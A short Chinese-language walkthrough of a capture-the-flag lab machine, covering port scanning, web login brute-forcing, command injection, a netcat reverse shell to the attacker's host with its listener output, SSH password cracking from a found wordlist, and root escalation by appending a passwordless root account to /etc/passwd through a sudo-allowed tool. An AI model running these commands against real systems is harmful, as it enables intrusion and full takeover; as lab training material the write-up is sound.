前言
咕了好久差点忘了~
信息收集
内网扫描一波找到目标,并通过nmap扫描其端口发现开着22、80端口
访问目标发现是一个登录框并提示admin登录
web渗透
利用burp的爆破模块得到账号密码为 admin/happy(但是我没爆破出来.jpg
发现可以执行命令,于是尝试抓包改参数执行命令
接着我们就可以构造payload通过nc反弹shell
代码语言:javascript复制nc 192.168.233.128 4444 -e /bin/bash
进去后查看home目录下有三个用户:charles、jim、sam,其中只有jim用户存在可用信息并找到了一个密码本
代码语言:javascript复制root@kali:~# nc -lvvp 4444
listening on [any] 4444 ...
192.168.233.134: inverse host lookup failed: Unknown host
connect to [192.168.233.128] from (UNKNOWN) [192.168.233.134] 35700
whoami
www-data
ls
command.php
css
images
index.php
login.php
logout.php
cd /home
ls
charles
jim
sam
ls charles/
ls sam/
ls jim/
backups
mbox
test.sh
ls backups/
old-passwords.bak
cat backups/old-passwords.bak
000000
12345
iloveyou
......接着我们就利用该密码本成功爆破出该ssh账号密码为 jim/jibril04
然后我们就可以ssh连上查看jim目录下的mbox,发现是root发的邮件
于是我们前往 /var/mail 查看邮件,进而发现 charles 的密码 ^xHhA&hvim0y
然后我们切换到 charles 用户,使用 sudo -l 发现 teehee 用户不用输入密码便可以有root权限
于是我们可以利用 teehee 提权,通过 teehee 用户添加一个admin用户
代码语言:javascript复制echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd最后切换到admin用户即可获取root权限,进而得到flag
